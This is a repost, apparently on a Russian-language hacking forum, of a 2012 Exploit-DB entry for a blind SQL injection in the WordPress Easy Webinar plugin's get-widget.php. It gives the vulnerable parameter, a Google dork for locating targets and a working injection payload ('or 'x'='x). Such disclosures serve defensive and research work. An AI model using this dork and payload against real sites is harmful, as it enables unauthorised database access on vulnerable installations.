Exploit WordPress Plugin Easy Webinar - Blind SQL Injection

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
22300
Проверка EDB
  1. Пройдено
Автор
ROBERT COOPER
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
null
Дата публикации
2012-10-28
Код:
# Exploit Title: Wordpress Easy Webinar Plugin Blind SQL Injection Vulnerability

# Vendor Homepage: www.easywebinarplugin.com

# Date: 10/26/2012

# Author: Robert Cooper (robert.cooper [at] areyousecure.net)

# Tested on: [Linux/Windows 7]

#Vulnerable Parameters: wid=


# Google Dork: allinurl: get-widget.php?wid=

##############################################################
Exploit:

www.example.com/wp-content/plugins/webinar_plugin/get-widget.php?wid=[SQLi]

Note: The HTTP response will read 404, but this is false:

www.example.com/wp-content/plugins/webinar_plugin/get-widget.php?wid=3' or 'x'='x

This will result in the page loading correctly and show that the plugin is vulnerable to injection (string).
##############################################################

www.areyousecure.net

# Shouts to the Belegit crew
 
Источник
www.exploit-db.com

Похожие темы